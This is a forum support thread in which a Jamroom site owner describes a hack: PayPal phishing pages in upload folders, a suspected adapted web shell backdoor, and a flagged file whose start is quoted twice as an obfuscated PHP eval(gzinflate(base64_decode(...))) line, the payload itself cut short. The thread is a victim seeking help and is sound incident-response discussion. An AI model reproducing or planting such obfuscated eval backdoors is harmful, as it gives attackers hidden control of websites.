I downloaded a fresh back-up yesterday. First issue I saw was it won't fully unzip. It says there is an unexpected ending.
However, I unzipped it as best I could and ran Avast anti-virus on the complete back-up. Avast didn't like 3 files.
1) In public_html config there was one called Works. I'm not sure if it's a false positive can you confirm.
It is full of stuff like this - <? eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIoquKomS
378fdP7iIi7ivHRM3sb1zOzM7s3EXd3EXsZeZeBTqRVKy7JnZXblbIgFkIpEAEolEIuGMnE5gh6Wi5QRj1zzr2L7v+U
Gxwprl1tdfOcnsIDT9cDJOFKNvHd8ee37ojAal
2) There were 2 upload folders with what appear to be English Paypal Phishing files (last time was German). Those have been deleted and the hosting company notified.
Question: Since we don't have any artists currently using Upload folders for FTP'ing files up, can those be disabled. This would just leave individual file uploads, and the multiple file uploader as options for now?
I'm thinking that may be how they are getting in, although there seems to be no way to know for sure. At least it's one potential doorway to close, if there is a means.
what is your host doing about this? Are they aware of what is going on?
Yes, they are aware. I had to get them to delete one of the hacker folders because in Apache mode it can't be done from my end, ownership has to be assigned first.
He said his programmer will look into it, but he doubts anything actionable will be found. The mail system is choked to 5 a day to prevent spamming of this stuff, which happened the first time with German phishing files.
The first time around files were found that appeared to be symlinked to the root according to Brian. No evidence of that this time so far.
I'm downloading another back-up so I can run a scan on it to make sure I'm clean. Passwords are changed again. Looking for suggestions.
I accidentally deleted the file when my anti-virus ran, so I will have to check back-ups to see if it existed in older versions. It was called Works and was found in public_html config folder. Does anyone know if Jamroom normally has a file by that name in that location and why Avast would see it as malware?
Also, the head programmer at the host company who has tons of experience, who used to run their own datacenter, and who is a security expert, said there has been an outbreak of this type of attack (publishing, e-mail) in the last 3 months. It's an unprecedented phenomenon of sorts which seems to be perpetrated by a new breed of automatic software.
Many well known and respectable companies have had to re-write their scripts to close holes, so it might be something for Jamroom to consider. I am told that neither the server root, or c-panel were compromised, it is the script itself which has the holes, as is turning out to be the case most everywhere with this new type of attack.
My site was detected because we had an unlimited e-mail account which they spammed with, but there could potentially be many Jamroom sites infected who are thus far oblivious, because their mail is set to under 200 a day.
This is all speculation at this point, but speculation by an expert in this field who really knows their stuff. I just throw it out there to be helpful, in case this is useful information the staff should take note of.
I found it in an old back-up and ran it at the site you linked. It came back as an error, not a valid string. Is it a Jamroom file which I need to put back, or a hacker file I need to remove? Avast says it's malware but I don't know if it's a false positive.
I can send you the file if you wish, but as the script authors, I thought you would be able to tell me just from the name.
Do not delete those files or your Jamroom will not work. They are not PHP files so are not open to being "hacked".
Hope this helps!
- Brian
Hi Brian,
1) That is the case, the two extras have different file numbers but inside they are identical. What scares me is they have an additional line of code not in the original .htpasswd - is that normal?
2) Also, I want to send a file I found to you for analysis. It is a version of the Webshell by Boff. I think they have adapted it for Jamroom, so that they can leave that there as a back door to give them undetectable control of a Jamroom site.
Are you interested in seeing the file, and if so how can I get it to you? You have no PM, no way to attach a file, and when I tried to send it to my host for inspection, the e-mail bounced it. I'm afraid to upload it anywhere and send a link, because I'm not entirely sure what it does.
3) Above I also asked about a file called Works that was found in In public_html config. Avast says it's malware so I deleted it. Is it malware, or should I put it back?
It is full of stuff like this - <? eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIoquKomS
378fdP7iIi7ivHRM3sb1zOzM7s3EXd3EXsZeZeBTqRVKy7JnZXblbIgFkIpEAEolEIuGMnE5gh6Wi5QRj1zzr2L7v+U
Gxwprl1tdfOcnsIDT9cDJOFKNvHd8ee37ojAal
4) I can't seem to make a viable back-up anymore. The 7 Zip program says the file is broken with an unexpected ending. Have you seen that before?
